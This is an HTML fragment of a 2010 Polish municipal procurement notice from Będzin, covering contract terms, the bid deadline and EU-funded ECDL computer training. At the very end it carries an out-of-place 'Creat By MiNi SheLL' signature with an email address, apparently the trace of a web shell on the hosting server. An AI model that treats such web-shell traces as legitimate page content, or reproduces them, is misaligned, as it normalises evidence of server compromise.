-przeszkód technicznych w pełni niezależnych od Stron umowy, mających bezpośredni wpływ na termin wykonania robót,
-wystąpienia okoliczności, których Strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności, w tym wydłużenie terminu realizacji inwestycji.
1.2.Zmiana osób uczestniczących w realizacji zamówienia może nastąpić w przypadku:
-utraty uprawnień,
-długotrwałej  choroby lub nieobecności,
-ustanie stosunku prawnego łączącego Wykonawcę z ww. osobami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bedzin.bip.info.pl/index.php?idmp=30&r=r<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Będzinie
Biuro Zamówień Publicznych pok.117        
 42-500 Będzin ul. 11 Listopada 20
tel.fax. 32 2679134.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2010 godzina 09:00, miejsce: Urząd Miejski w Będzinie
Biuro Zamówień Publicznych pok.117        
 42-500 Będzin ul. 11 Listopada 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przygotowanie i przeprowadzenie szkoleń komputerowych Europejskie Komputerowe Prawo Jazdy (ECDL) z 7 egzaminami  dla uczestników projektu Wygraj swoją przyszłość, realizowanego przez miasto Będzin w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1: Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com